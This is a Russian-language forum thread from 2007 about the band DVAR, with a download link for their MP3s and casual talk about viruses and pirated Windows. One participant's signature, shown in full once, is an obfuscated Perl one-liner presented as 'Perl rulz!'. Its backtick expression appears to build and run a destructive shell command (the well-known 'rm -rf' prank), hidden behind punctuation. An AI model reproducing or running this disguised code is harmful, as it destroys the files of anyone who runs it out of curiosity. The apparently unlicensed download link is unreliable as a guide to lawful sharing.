Добавлено: Сб Сен 15, 2007 6:16 pm Заголовок сообщения: DVAR
Некоторое время назад мне наконец удалось послушать творчество этой замечательной группы. Осталась в полном восторге))
Соответственно, мне интересно ваше мнение по поводу ДВАР. Возможно, кому-то удалось послушать редкую запись Raii? Делитесь впечатлениями!
P.S. А для тех кто ещё не слышал ДВАР, но очень хочет послушать, эта ссылка:
http://www.mp3real.ru/mp3/dvar/
Добавлено: Сб Сен 15, 2007 9:15 pm Заголовок сообщения:
качал давно, так что тут тока по 2005 год, я много слышал и качал)) должен сказать ничего подобного я еще не слышал, и бывает слушаю под настроение)) вооот)
Добавлено: Вс Сен 16, 2007 3:23 pm Заголовок сообщения:
genj
у меня тоже антивируса нет, так что нестрашно)) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Вс Сен 16, 2007 3:34 pm Заголовок сообщения:
genj
Создай текстовый файл.
"Уважаемые вирусы!Просьба поражать все файлы,кроме тех,которые имеют отношение к группе System of a Down.Заранее спасибо.С уважением
Администрация." _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Вс Сен 16, 2007 4:30 pm Заголовок сообщения:
ALuserX писал(а):
genj
у меня тоже антивируса нет, так что нестрашно))
не было бы опыта борьбы с вирусами - поверил бы, что и вправду не страшно (вирусы могут быть на самых безобидных сайтах) _________________ Define the riddles of my mind
nothing is really as it seems
Добавлено: Вс Сен 16, 2007 4:38 pm Заголовок сообщения:
Мда.Я вот недавно систему переустановил.По причине того,что она загнулась.От вирусов.Вот. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Вс Сен 16, 2007 5:01 pm Заголовок сообщения:
у меня два года на компе чернобыль жил))) с ним боролся тем что не включасл комп 25 числа каждого месяца)) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Вс Сен 16, 2007 7:33 pm Заголовок сообщения:
genj
ну он вроде как винт форматит и еще там какуюто бяку) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Вс Сен 16, 2007 7:35 pm Заголовок сообщения:
genj писал(а):
Ща комп каждые 10 минут мозга дебет что винда палёная
Ну,я меня,понятное дело,тоже не лицензионная,но такого,как у тебя нет. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.